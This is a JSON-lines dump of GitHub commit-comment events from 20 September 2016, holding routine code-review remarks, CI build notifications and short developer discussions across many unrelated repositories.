{"id":"4589602038","type":"CommitCommentEvent","actor":{"login":"loganmc10"},"repo":{"name":"gonetz/GLideN64"},"payload":{"comment":{"id":19096015,"position":null,"line":null,"path":null,"commit_id":"8dad84cc39571c295d10a3b3c9326fa942478fcd","created_at":"2016-09-20T13:22:54Z","updated_at":"2016-09-20T13:22:54Z","body":"Sorry nevermind, I used the GLES3 version of the plugin, which enabled fragment based depth writing, then switched to GLES2, and it stayed on, I need to force that option to be disabled in GLES2 mode in RetroArch"}},"created_at":"2016-09-20T13:22:54Z"}
{"id":"4589604287","type":"CommitCommentEvent","actor":{"login":"timabbott"},"repo":{"name":"timabbott/zulip"},"payload":{"comment":{"id":19096018,"position":null,"line":null,"path":null,"commit_id":"d084a35862d13356e1cf237ff36c44c97448c78f","created_at":"2016-09-20T13:23:18Z","updated_at":"2016-09-20T13:23:18Z","body":"@xKarloS2 can you explain what you meant?"}},"created_at":"2016-09-20T13:23:18Z"}
{"id":"4589604667","type":"CommitCommentEvent","actor":{"login":"Remiii"},"repo":{"name":"PUGX/PUGXGeoFormBundle"},"payload":{"comment":{"id":19096020,"position":null,"line":null,"path":null,"commit_id":"0be41acbb2f30c43bc712970c538209edd8bb52d","created_at":"2016-09-20T13:23:22Z","updated_at":"2016-09-20T13:23:22Z","body":"@garak I have still the problem... but when I use `composer install --no-dev` instead of `composer install --no-dev --optimize-autoloader` everything is fine. So my problem is with the `--optimize-autoloader` composer option. :-( If you have any idea. ;-)"}},"created_at":"2016-09-20T13:23:22Z"}
{"id":"4589605032","type":"CommitCommentEvent","actor":{"login":"sawyernovak"},"repo":{"name":"uniform-team/Uniform-Validation-Language"},"payload":{"comment":{"id":19096022,"position":6,"line":6,"path":"src/dependable.js","commit_id":"051e60ea75b26efe7ef11c4679a69106b2c6029c","created_at":"2016-09-20T13:23:26Z","updated_at":"2016-09-20T13:23:26Z","body":"why clazz...is that a thing"}},"created_at":"2016-09-20T13:23:26Z"}
{"id":"4589615185","type":"CommitCommentEvent","actor":{"login":"ivomarsan"},"repo":{"name":"joeluchoa/academic_life"},"payload":{"comment":{"id":19096050,"position":null,"line":null,"path":null,"commit_id":"342dc071551e37f5dfc7d691b75095abb1bbd79f","created_at":"2016-09-20T13:25:10Z","updated_at":"2016-09-20T13:25:10Z","body":"Arrepiou-me a epiderme com este commit"}},"created_at":"2016-09-20T13:25:10Z"}
{"id":"4589615364","type":"CommitCommentEvent","actor":{"login":"markbrough"},"repo":{"name":"okfde/2030-watch.de"},"payload":{"comment":{"id":19096051,"position":null,"line":null,"path":null,"commit_id":"d9bfd8a4ce2aa66b5d039f47c728db26ef7fd0a9","created_at":"2016-09-20T13:25:11Z","updated_at":"2016-09-20T13:25:11Z","body":"It's hard to see the menu items (on my small screen at least). Suggest inserting as a quasi-menu item instead?\r\n![screen shot 2016-09-20 at 15 07 12](https://cloud.githubusercontent.com/assets/688113/18671309/f423fd9e-7f43-11e6-9df8-6bff03dd3ed5.png)\r\n"}},"created_at":"2016-09-20T13:25:11Z"}
{"id":"4589617802","type":"CommitCommentEvent","actor":{"login":"ymarcon"},"repo":{"name":"interconnectDiabetes/interconnectDocker"},"payload":{"comment":{"id":19096056,"position":null,"line":null,"path":null,"commit_id":"fe2cd841233a43cdc8224c3ed9abe29cdeb20289","created_at":"2016-09-20T13:25:37Z","updated_at":"2016-09-20T13:25:37Z","body":"\"latest\" tag is now available for rserver:\r\nhttps://hub.docker.com/r/obiba/opal-rserver/tags/"}},"created_at":"2016-09-20T13:25:37Z"}
{"id":"4589618710","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":19096058,"position":null,"line":null,"path":null,"commit_id":"515fe02ce64cf7c1d18a669206ff1021df67017f","created_at":"2016-09-20T13:25:47Z","updated_at":"2016-09-20T13:25:47Z","body":"all tests pass:\nsuccess: http://buildbot.bos1/builders/test-riak_kv/builds/3953\n"}},"created_at":"2016-09-20T13:25:47Z"}
{"id":"4589620475","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19096061,"position":null,"line":null,"path":null,"commit_id":"2016a50d3ddad734e26b085fb25be39c157f31f1","created_at":"2016-09-20T13:26:07Z","updated_at":"2016-09-20T13:26:07Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1069](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13637&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-20T13:26:07Z"}
{"id":"4589623328","type":"CommitCommentEvent","actor":{"login":"loppear"},"repo":{"name":"nxus/admin"},"payload":{"comment":{"id":19096064,"position":9,"line":9,"path":"src/AdminController.js","commit_id":"6e9b430cdcd2d39afe67dbd3fcb4fe3581175508","created_at":"2016-09-20T13:26:36Z","updated_at":"2016-09-20T13:26:36Z","body":"Should be case-insensitive and still include the rest of the target name, and should probably duplicate the ViewController default logic here for constructing that from new.target.name:\r\n\r\n```\r\nopts.templatePrefix = opts.templatePrefix || opts.prefix || morphed.toDashed(new.target.name)\r\nif (!opts.templatePrefix.startsWith(\"admin-\")) { opts.templatePrefx = \"admin-\"+opts.templatePrefix }\r\n```"}},"created_at":"2016-09-20T13:26:36Z"}
{"id":"4589625511","type":"CommitCommentEvent","actor":{"login":"arina-ielchiieva"},"repo":{"name":"Serhii-Harnyk/drill"},"payload":{"comment":{"id":19096070,"position":49,"line":157,"path":"exec/java-exec/src/main/java/org/apache/drill/exec/vector/complex/fn/JsonReader.java","commit_id":"87bb536b626fc7d2720b085f566e330e321e4cda","created_at":"2016-09-20T13:26:58Z","updated_at":"2016-09-20T13:26:58Z","body":"Add description"}},"created_at":"2016-09-20T13:26:58Z"}
{"id":"4589625691","type":"CommitCommentEvent","actor":{"login":"lucaswerkmeister"},"repo":{"name":"ceylon/ceylon.tool.converter.java2ceylon"},"payload":{"comment":{"id":19096071,"position":null,"line":null,"path":null,"commit_id":"9046dad3208adce2c121c0fee7a38914cdfc5d19","created_at":"2016-09-20T13:26:59Z","updated_at":"2016-09-20T13:26:59Z","body":"Wasn’t this done in 219a4154f03bbaf640a997f2cd45386bf716a474 already?"}},"created_at":"2016-09-20T13:26:59Z"}
{"id":"4589631123","type":"CommitCommentEvent","actor":{"login":"arina-ielchiieva"},"repo":{"name":"Serhii-Harnyk/drill"},"payload":{"comment":{"id":19096080,"position":21,"line":662,"path":"exec/java-exec/src/test/java/org/apache/drill/exec/vector/complex/writer/TestJsonReader.java","commit_id":"87bb536b626fc7d2720b085f566e330e321e4cda","created_at":"2016-09-20T13:27:56Z","updated_at":"2016-09-20T13:27:56Z","body":"Autoclosable"}},"created_at":"2016-09-20T13:27:56Z"}
{"id":"4589636796","type":"CommitCommentEvent","actor":{"login":"jackha"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19096089,"position":8,"line":7,"path":"cura/Settings/SettingInheritanceManager.py","commit_id":"7793cb16d1a421afc1e5badfc342d92f76fcb517","created_at":"2016-09-20T13:28:52Z","updated_at":"2016-09-20T13:28:52Z","body":"It will get better, I feel it"}},"created_at":"2016-09-20T13:28:52Z"}
{"id":"4589641039","type":"CommitCommentEvent","actor":{"login":"leelarose-18"},"repo":{"name":"leelarose-18/polis.js"},"payload":{"comment":{"id":19096104,"position":null,"line":null,"path":null,"commit_id":"e40ea1a7986321cd94a5d140ed3675ed7f115fef","created_at":"2016-09-20T13:29:36Z","updated_at":"2016-09-20T13:29:36Z","body":"hello"}},"created_at":"2016-09-20T13:29:36Z"}
{"id":"4589641458","type":"CommitCommentEvent","actor":{"login":"hstastna"},"repo":{"name":"hstastna/manageiq"},"payload":{"comment":{"id":19096106,"position":null,"line":null,"path":null,"commit_id":"253780ee1f5681a735cfc21810c6bb0d3e438a48","created_at":"2016-09-20T13:29:39Z","updated_at":"2016-09-20T13:29:39Z","body":"This needs to be merged first! https://github.com/ManageIQ/manageiq/pull/11065"}},"created_at":"2016-09-20T13:29:39Z"}
{"id":"4589642150","type":"CommitCommentEvent","actor":{"login":"arina-ielchiieva"},"repo":{"name":"Serhii-Harnyk/drill"},"payload":{"comment":{"id":19096110,"position":31,"line":672,"path":"exec/java-exec/src/test/java/org/apache/drill/exec/vector/complex/writer/TestJsonReader.java","commit_id":"87bb536b626fc7d2720b085f566e330e321e4cda","created_at":"2016-09-20T13:29:47Z","updated_at":"2016-09-20T13:29:47Z","body":"Set before all queries"}},"created_at":"2016-09-20T13:29:47Z"}
{"id":"4589644166","type":"CommitCommentEvent","actor":{"login":"rayglover"},"repo":{"name":"tensorflow/serving"},"payload":{"comment":{"id":19096113,"position":247,"line":258,"path":"tensorflow_serving/g3doc/serving_advanced.md","commit_id":"156e52b9835ed2d84eda7da31845a5deb86b1abe","created_at":"2016-09-20T13:30:07Z","updated_at":"2016-09-20T13:30:07Z","body":"I believe this should be `bazel build //tensorflow_serving/model_servers:tensorflow_model_server`"}},"created_at":"2016-09-20T13:30:07Z"}
{"id":"4589644453","type":"CommitCommentEvent","actor":{"login":"arina-ielchiieva"},"repo":{"name":"Serhii-Harnyk/drill"},"payload":{"comment":{"id":19096115,"position":39,"line":680,"path":"exec/java-exec/src/test/java/org/apache/drill/exec/vector/complex/writer/TestJsonReader.java","commit_id":"87bb536b626fc7d2720b085f566e330e321e4cda","created_at":"2016-09-20T13:30:11Z","updated_at":"2016-09-20T13:30:11Z","body":"the same as above"}},"created_at":"2016-09-20T13:30:11Z"}
{"id":"4589645223","type":"CommitCommentEvent","actor":{"login":"arina-ielchiieva"},"repo":{"name":"Serhii-Harnyk/drill"},"payload":{"comment":{"id":19096119,"position":47,"line":688,"path":"exec/java-exec/src/test/java/org/apache/drill/exec/vector/complex/writer/TestJsonReader.java","commit_id":"87bb536b626fc7d2720b085f566e330e321e4cda","created_at":"2016-09-20T13:30:18Z","updated_at":"2016-09-20T13:30:18Z","body":"the same as above"}},"created_at":"2016-09-20T13:30:18Z"}
{"id":"4589646160","type":"CommitCommentEvent","actor":{"login":"dmnks"},"repo":{"name":"rpm-software-management/yum"},"payload":{"comment":{"id":19096123,"position":6,"line":751,"path":"yum/yumRepo.py","commit_id":"a923e09f2552d8be7e673f8ad810775612c6e28d","created_at":"2016-09-20T13:30:27Z","updated_at":"2016-09-20T13:30:27Z","body":"I realized this is actually wrong; it defeats the sole purpose of preloading because yum would always be forced to download a fresh repomd.xml from the server later on, including the actual metadata files (primary etc.) if root doesn't have them up-to-date.\r\n\r\nI have to rethink this part and maybe the whole patch..."}},"created_at":"2016-09-20T13:30:27Z"}
{"id":"4589647818","type":"CommitCommentEvent","actor":{"login":"j0k3r"},"repo":{"name":"wallabag/wallabag"},"payload":{"comment":{"id":19096129,"position":8,"line":443,"path":"src/Wallabag/CoreBundle/Resources/translations/messages.fr.yml","commit_id":"24ec02440959dd4a77031a0bad034791031b0e47","created_at":"2016-09-20T13:30:45Z","updated_at":"2016-09-20T13:30:45Z","body":"You should keep that one instead of the other one."}},"created_at":"2016-09-20T13:30:45Z"}
{"id":"4589650430","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19096138,"position":null,"line":null,"path":null,"commit_id":"8b0bcf3cdefea00d7760abfa73545d148ea8d3fd","created_at":"2016-09-20T13:31:12Z","updated_at":"2016-09-20T13:31:12Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1070](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13640&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-20T13:31:12Z"}
{"id":"4589653504","type":"CommitCommentEvent","actor":{"login":"rayglover-ibm"},"repo":{"name":"tensorflow/serving"},"payload":{"comment":{"id":19096146,"position":247,"line":258,"path":"tensorflow_serving/g3doc/serving_advanced.md","commit_id":"156e52b9835ed2d84eda7da31845a5deb86b1abe","created_at":"2016-09-20T13:31:43Z","updated_at":"2016-09-20T13:31:43Z","body":"I believe this should be `bazel build //tensorflow_serving/model_servers:tensorflow_model_server` (colon)"}},"created_at":"2016-09-20T13:31:43Z"}
{"id":"4589660280","type":"CommitCommentEvent","actor":{"login":"yongjie917"},"repo":{"name":"easemob/easeui_ios"},"payload":{"comment":{"id":19096162,"position":null,"line":null,"path":null,"commit_id":"09f321d0101c6df3dc7e62d0f6ed74b8c8716ab7","created_at":"2016-09-20T13:32:56Z","updated_at":"2016-09-20T13:32:56Z","body":"yongjie917@icloud.com"}},"created_at":"2016-09-20T13:32:56Z"}
{"id":"4589662379","type":"CommitCommentEvent","actor":{"login":"jampy"},"repo":{"name":"elektron-technology/nedb"},"payload":{"comment":{"id":19096168,"position":5,"line":24,"path":"package.json","commit_id":"a30cbcca4f05e2f400ad418e09a2863bd2abc686","created_at":"2016-09-20T13:33:17Z","updated_at":"2016-09-20T13:33:17Z","body":"FYI, there is a typo (`serach`)"}},"created_at":"2016-09-20T13:33:17Z"}
{"id":"4589662846","type":"CommitCommentEvent","actor":{"login":"rleonhardt"},"repo":{"name":"WhisperSystems/Signal-Android"},"payload":{"comment":{"id":19096169,"position":null,"line":null,"path":null,"commit_id":"3bec127020ca9d63f0964672adfc90d5753d3a90","created_at":"2016-09-20T13:33:22Z","updated_at":"2016-09-20T13:33:22Z","body":"@jan-kiszka How can I sign the gradle build, should I generate my own certificate?\r\nOr is an unsigned debug build enough to restore on the unrooted target device?\r\n\r\n@tedks True, there are multiple options to exclude data from the backup:\r\n* statically (definitions in the Manifest file)\r\n  * [android:allowBackup=\"false\"](https://developer.android.com/training/backup/autosyncapi.html#disabling) -> exclude everything / disabling backup (currently used)\r\n  * [android:fullBackupContent=\"@xml/mybackupscheme\"](https://developer.android.com/training/backup/autosyncapi.html#configuring) -> include or exclude files\r\n* dynamically (in the source code)\r\n  * [getNoBackupFilesDir()](https://developer.android.com/reference/android/content/ContextWrapper.html#getNoBackupFilesDir()) -> exclude a single dir\r\n  * [onFullBackup()](https://developer.android.com/reference/android/app/backup/BackupAgent.html#onFullBackup(android.app.backup.FullBackupDataOutput)) -> include specific files only (most flexible method)\r\n\r\nThe dynamic method could check if Airplane Mode is currently active if necessary, and provide a different set of files to be included, i.e. backup private keys to storage if the device is offline, otherwise enrypted files only."}},"created_at":"2016-09-20T13:33:22Z"}
{"id":"4589664966","type":"CommitCommentEvent","actor":{"login":"loppear"},"repo":{"name":"nxus/admin"},"payload":{"comment":{"id":19096177,"position":9,"line":9,"path":"src/AdminController.js","commit_id":"6e9b430cdcd2d39afe67dbd3fcb4fe3581175508","created_at":"2016-09-20T13:33:44Z","updated_at":"2016-09-20T13:33:44Z","body":"above was assuming naming style of `AdminMVCTestItem` rather than `MVCTestItemAdmin` - my proposed code would have a template prefix of `admin-mvc-test-item-admin`. Since it's going to be very likely that admin subclasses have Admin somewhere in the name anyways (or at least something to differentiate it - `ManageMVCTestItem` say), we don't have to override, simpler to document the ViewController template naming convention and just let that work. so strike this thread."}},"created_at":"2016-09-20T13:33:44Z"}
{"id":"4589667423","type":"CommitCommentEvent","actor":{"login":"Alpccelik"},"repo":{"name":"anadolubk/anadolubk-android"},"payload":{"comment":{"id":19096181,"position":33,"line":33,"path":"app/src/main/java/tr/edu/anadolu/bk/android/AnnouncementAdapter.java","commit_id":"9067ea5b3d1ecccd0a7a9ce3b0fcc2f1462334ce","created_at":"2016-09-20T13:34:09Z","updated_at":"2016-09-20T13:34:09Z","body":"kaldırdım\r\n"}},"created_at":"2016-09-20T13:34:09Z"}
{"id":"4589669924","type":"CommitCommentEvent","actor":{"login":"arina-ielchiieva"},"repo":{"name":"Serhii-Harnyk/drill"},"payload":{"comment":{"id":19096190,"position":23,"line":664,"path":"exec/java-exec/src/test/java/org/apache/drill/exec/vector/complex/writer/TestJsonReader.java","commit_id":"87bb536b626fc7d2720b085f566e330e321e4cda","created_at":"2016-09-20T13:34:34Z","updated_at":"2016-09-20T13:34:34Z","body":"Constant?"}},"created_at":"2016-09-20T13:34:34Z"}
{"id":"4589670416","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19096193,"position":null,"line":null,"path":null,"commit_id":"2016a50d3ddad734e26b085fb25be39c157f31f1","created_at":"2016-09-20T13:34:39Z","updated_at":"2016-09-20T13:34:39Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1069](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13637&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 1 (1 new), passed: 218, ignored: 3 Build time: 00:08:32\n### Failed tests\n```\norg.genivi.sota.device_registry.DeviceResourceSpec.GET request with ?regex yields devices which match the regex.: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-20T13:34:39Z"}
{"id":"4589671093","type":"CommitCommentEvent","actor":{"login":"SmokeyBR"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":19096196,"position":null,"line":null,"path":null,"commit_id":"c97015fb9abcd6577d2458833058dfac54179aac","created_at":"2016-09-20T13:34:46Z","updated_at":"2016-09-20T13:34:46Z","body":"i made the changes on my server by overwriting salvage_vehicle.sqf on mission folder.\r\nengine and fueltank can be salvaged and are not available after salvage but cars can still be ridden after taking out engine and fueltank also when u look at repair percentage will show \"engine = 89%\", \"Fueltank = 89%\""}},"created_at":"2016-09-20T13:34:46Z"}
{"id":"4589671783","type":"CommitCommentEvent","actor":{"login":"arina-ielchiieva"},"repo":{"name":"Serhii-Harnyk/drill"},"payload":{"comment":{"id":19096199,"position":19,"line":59,"path":"exec/java-exec/src/main/java/org/apache/drill/exec/vector/complex/fn/JsonReader.java","commit_id":"87bb536b626fc7d2720b085f566e330e321e4cda","created_at":"2016-09-20T13:34:53Z","updated_at":"2016-09-20T13:34:53Z","body":"Description"}},"created_at":"2016-09-20T13:34:53Z"}
{"id":"4589673108","type":"CommitCommentEvent","actor":{"login":"lwtmusou"},"repo":{"name":"lwtmusou/touhoukill"},"payload":{"comment":{"id":19096204,"position":5,"line":1469,"path":"src/package/th06.cpp","commit_id":"b8df57485e94c49ec52e5643b803ed18fc3703c8","created_at":"2016-09-20T13:35:07Z","updated_at":"2016-09-20T13:35:07Z","body":"笨蛋删了"}},"created_at":"2016-09-20T13:35:07Z"}
{"id":"4589674699","type":"CommitCommentEvent","actor":{"login":"anthonymabery1234"},"repo":{"name":"anthonymabery1234/Tracking"},"payload":{"comment":{"id":19096207,"position":null,"line":null,"path":null,"commit_id":"baab9c6e19a6557bbc011efa9eb991cd174b9a6d","created_at":"2016-09-20T13:35:22Z","updated_at":"2016-09-20T13:35:22Z","body":"hello"}},"created_at":"2016-09-20T13:35:22Z"}
{"id":"4589676212","type":"CommitCommentEvent","actor":{"login":"Joanmarie"},"repo":{"name":"Spec-Ops/web-platform-tests"},"payload":{"comment":{"id":19096211,"position":null,"line":null,"path":null,"commit_id":"f2633e87ee1eafc0776a2c9f6bfa202554959e68","created_at":"2016-09-20T13:35:37Z","updated_at":"2016-09-20T13:35:37Z","body":"Please revert this. Whereas before I had one test that (for some reason, which I will look into) never finished without manual intervention, now all tests never finish and require manual intervention."}},"created_at":"2016-09-20T13:35:37Z"}
{"id":"4589677837","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"AlexeyDomnin/SberRepo"},"payload":{"comment":{"id":19096216,"position":18,"line":18,"path":"src/ru/sberbank/javaschool/hometask3/Task2.java","commit_id":"a0e3225cb5f13ed41557c61f38f6fa266061b149","created_at":"2016-09-20T13:35:53Z","updated_at":"2016-09-20T13:35:53Z","body":"Само условие написано правильно.\r\nВопрос в красоте кода. В вашем варианте 2 тернарных операции в одной строке - сложно читается. Таких конструкций лучше избегать. Тому, кто потом на этот код смотреть будет, придётся постараться, чтобы понять что здесь имелось ввиду.\r\nНапример, можно так:\r\n        int cmpByLength = Integer.compare(o1.length(), o2.length());\r\n        return cmpByLength == 0 ? o1.compareTo(o2) : cmpByLength;\r\nНо это тоже не лучший вариант - лучше всего организовать цепочку компараторов, так как здесь по сути 2 разных компаратора. Пример можно подсмотреть в 8-й джаве, в ней был добавлен метод Comparator.thenComparing"}},"created_at":"2016-09-20T13:35:53Z"}
{"id":"4589679363","type":"CommitCommentEvent","actor":{"login":"mef"},"repo":{"name":"Mango-information-systems/twitto_be"},"payload":{"comment":{"id":19096225,"position":null,"line":null,"path":null,"commit_id":"553d4742d6929c48316a0f069e13697a85c178f0","created_at":"2016-09-20T13:36:09Z","updated_at":"2016-09-20T13:36:09Z","body":"@11digitlabs when you are confident about the storage data structure, could you isolate the change to the data storage (in `controller/tweets.js`) inside a separate commit in branch `2.2.0-pre` based on master, please?\r\n\r\nThis is so that we release this already now, and in 24 hours all the tweets in the dataset will contain the extra data..."}},"created_at":"2016-09-20T13:36:09Z"}
{"id":"4589680397","type":"CommitCommentEvent","actor":{"login":"mjreich"},"repo":{"name":"nxus/admin"},"payload":{"comment":{"id":19096227,"position":8,"line":8,"path":"src/AdminController.js","commit_id":"6e9b430cdcd2d39afe67dbd3fcb4fe3581175508","created_at":"2016-09-20T13:36:18Z","updated_at":"2016-09-20T13:36:18Z","body":"Agree: my uninformed assumptions was that submodules could be imported as 'nxus-' modules.  That would still be my preference if we can swing it.\r\n\r\nThough for this case, the preference would be for AdminController to not be an exposed submodule and instead stay accessed through `import {AdminController} from 'nexus-admin'`"}},"created_at":"2016-09-20T13:36:18Z"}
{"id":"4589681356","type":"CommitCommentEvent","actor":{"login":"mjreich"},"repo":{"name":"nxus/admin"},"payload":{"comment":{"id":19096232,"position":9,"line":9,"path":"src/AdminController.js","commit_id":"6e9b430cdcd2d39afe67dbd3fcb4fe3581175508","created_at":"2016-09-20T13:36:27Z","updated_at":"2016-09-20T13:36:27Z","body":"Looks good"}},"created_at":"2016-09-20T13:36:27Z"}
{"id":"4589682239","type":"CommitCommentEvent","actor":{"login":"arina-ielchiieva"},"repo":{"name":"Serhii-Harnyk/drill"},"payload":{"comment":{"id":19096236,"position":16,"line":657,"path":"exec/java-exec/src/test/java/org/apache/drill/exec/vector/complex/writer/TestJsonReader.java","commit_id":"87bb536b626fc7d2720b085f566e330e321e4cda","created_at":"2016-09-20T13:36:36Z","updated_at":"2016-09-20T13:36:36Z","body":"Add jira number // DRILL-8888"}},"created_at":"2016-09-20T13:36:36Z"}
{"id":"4589684125","type":"CommitCommentEvent","actor":{"login":"Cat7373"},"repo":{"name":"XX-net/XX-Net"},"payload":{"comment":{"id":19096241,"position":null,"line":null,"path":null,"commit_id":"ae7fd8d252f941e6db575593381d3cd3c5288806","created_at":"2016-09-20T13:36:53Z","updated_at":"2016-09-20T13:36:53Z","body":"0.0"}},"created_at":"2016-09-20T13:36:53Z"}
{"id":"4589684632","type":"CommitCommentEvent","actor":{"login":"arina-ielchiieva"},"repo":{"name":"Serhii-Harnyk/drill"},"payload":{"comment":{"id":19096250,"position":18,"line":659,"path":"exec/java-exec/src/test/java/org/apache/drill/exec/vector/complex/writer/TestJsonReader.java","commit_id":"87bb536b626fc7d2720b085f566e330e321e4cda","created_at":"2016-09-20T13:36:59Z","updated_at":"2016-09-20T13:36:59Z","body":"Add description that failure occurs when second batch starts with null etc"}},"created_at":"2016-09-20T13:36:59Z"}
{"id":"4589693173","type":"CommitCommentEvent","actor":{"login":"mjreich"},"repo":{"name":"nxus/admin"},"payload":{"comment":{"id":19096273,"position":9,"line":9,"path":"src/AdminController.js","commit_id":"6e9b430cdcd2d39afe67dbd3fcb4fe3581175508","created_at":"2016-09-20T13:38:22Z","updated_at":"2016-09-20T13:38:22Z","body":"@loppear that's fine, but then logically `MVCTestItemEdit` should be `EditMVCTestItem` as well."}},"created_at":"2016-09-20T13:38:22Z"}
{"id":"4589697418","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19096278,"position":null,"line":null,"path":null,"commit_id":"8b0bcf3cdefea00d7760abfa73545d148ea8d3fd","created_at":"2016-09-20T13:38:59Z","updated_at":"2016-09-20T13:38:59Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1070](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13640&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 245, ignored: 3 Build time: 00:07:46"}},"created_at":"2016-09-20T13:38:59Z"}
{"id":"4589705747","type":"CommitCommentEvent","actor":{"login":"loppear"},"repo":{"name":"nxus/admin"},"payload":{"comment":{"id":19096301,"position":9,"line":9,"path":"src/AdminController.js","commit_id":"6e9b430cdcd2d39afe67dbd3fcb4fe3581175508","created_at":"2016-09-20T13:40:17Z","updated_at":"2016-09-20T13:40:17Z","body":"Right, I'm saying either way is fine, don't use my proposed change above to assume/enforce one or the other. :)"}},"created_at":"2016-09-20T13:40:17Z"}
{"id":"4589714265","type":"CommitCommentEvent","actor":{"login":"wadehenning"},"repo":{"name":"wadehenning/KernelDensityEstimate.jl"},"payload":{"comment":{"id":19096322,"position":null,"line":null,"path":null,"commit_id":"a6e161640244de8e33b942bf57a58438f948dc33","created_at":"2016-09-20T13:41:41Z","updated_at":"2016-09-20T13:41:41Z","body":"@dehann I would be happy to work with you on this."}},"created_at":"2016-09-20T13:41:41Z"}
{"id":"4589717854","type":"CommitCommentEvent","actor":{"login":"chapmanb"},"repo":{"name":"chapmanb/bcbio-nextgen"},"payload":{"comment":{"id":19096327,"position":20,"line":57,"path":"bcbio/variation/gatkjoint.py","commit_id":"697f13cdc1de35b02be561b0a92be439e54d5a4c","created_at":"2016-09-20T13:42:14Z","updated_at":"2016-09-20T13:42:14Z","body":"Thanks for the discussion, I'll continue the discussion on your issue #1564"}},"created_at":"2016-09-20T13:42:14Z"}
{"id":"4589719783","type":"CommitCommentEvent","actor":{"login":"timgraham"},"repo":{"name":"django/django-box"},"payload":{"comment":{"id":19096331,"position":null,"line":null,"path":null,"commit_id":"317af9ec23c780cc5055df046f12e1baccbbb818","created_at":"2016-09-20T13:42:33Z","updated_at":"2016-09-20T13:42:33Z","body":"Also add this to `settings.CACHES`:\r\n```python\r\n'pylibmc': {\r\n    'BACKEND': 'django.core.cache.backends.memcached.PyLibMCCache',\r\n    'LOCATION': '127.0.0.1:11211',\r\n}\r\n```\r\nand if it's important to support older versions of Django:\r\n```python\r\nif django.VERSION < (1, 10):\r\n    del CACHES['pylibmc']\r\n```"}},"created_at":"2016-09-20T13:42:33Z"}
{"id":"4589724514","type":"CommitCommentEvent","actor":{"login":"mjreich"},"repo":{"name":"nxus/admin"},"payload":{"comment":{"id":19096340,"position":9,"line":9,"path":"src/AdminController.js","commit_id":"6e9b430cdcd2d39afe67dbd3fcb4fe3581175508","created_at":"2016-09-20T13:43:18Z","updated_at":"2016-09-20T13:43:18Z","body":"Struck"}},"created_at":"2016-09-20T13:43:18Z"}
{"id":"4589730617","type":"CommitCommentEvent","actor":{"login":"mjreich"},"repo":{"name":"nxus/admin"},"payload":{"comment":{"id":19096351,"position":8,"line":8,"path":"src/AdminController.js","commit_id":"6e9b430cdcd2d39afe67dbd3fcb4fe3581175508","created_at":"2016-09-20T13:44:19Z","updated_at":"2016-09-20T13:44:19Z","body":"What's the circular dependency?"}},"created_at":"2016-09-20T13:44:19Z"}
{"id":"4589731937","type":"CommitCommentEvent","actor":{"login":"Sims24"},"repo":{"name":"centreon/centreon-plugins"},"payload":{"comment":{"id":19096352,"position":null,"line":null,"path":null,"commit_id":"8dce544771ab4e2ac091b29e10ee6871fa88bdff","created_at":"2016-09-20T13:44:31Z","updated_at":"2016-09-20T13:44:31Z","body":"Hi @garnier-quentin , Line 118, should remove last quote after exit_litteral no ? "}},"created_at":"2016-09-20T13:44:31Z"}
{"id":"4589736824","type":"CommitCommentEvent","actor":{"login":"mrose17"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19096364,"position":null,"line":null,"path":null,"commit_id":"80821db93448a10ff6621cabe5252db84c0e1925","created_at":"2016-09-20T13:45:17Z","updated_at":"2016-09-20T13:45:17Z","body":"i like it! test plan? (that's rich coming from me...)"}},"created_at":"2016-09-20T13:45:17Z"}
{"id":"4589750127","type":"CommitCommentEvent","actor":{"login":"jjoshua2"},"repo":{"name":"syzygy1/Cfish"},"payload":{"comment":{"id":19096388,"position":null,"line":null,"path":null,"commit_id":"0e87738288099cb2b434b948e8b3730aac420794","created_at":"2016-09-20T13:47:27Z","updated_at":"2016-09-20T13:47:27Z","body":"Seems to work better on windows now too."}},"created_at":"2016-09-20T13:47:27Z"}
{"id":"4589756257","type":"CommitCommentEvent","actor":{"login":"renz45"},"repo":{"name":"drinkingChai/angular-project-3"},"payload":{"comment":{"id":19096402,"position":5,"line":18,"path":"app/assets/templates/notes/edit.html","commit_id":"aaa6f0a158444d93095f0ad1e315186fa84dd4a4","created_at":"2016-09-20T13:48:26Z","updated_at":"2016-09-20T13:48:26Z","body":"Ah hah! It took me a minute of trying things. I originally thought it was the newer version of angular you were using. The bit that's making this submit is in the form tag at the top. IT should only be `<form></form>` instead of having the `action` and `method` attributes.\r\n\r\nSo change: \r\n\r\n```html\r\n<form class=\"\" action=\"index.html\" method=\"post\">\r\n```\r\n\r\nto\r\n\r\n```html\r\n<form class=\"\">\r\n```\r\n\r\nAnd it should work. :)"}},"created_at":"2016-09-20T13:48:26Z"}
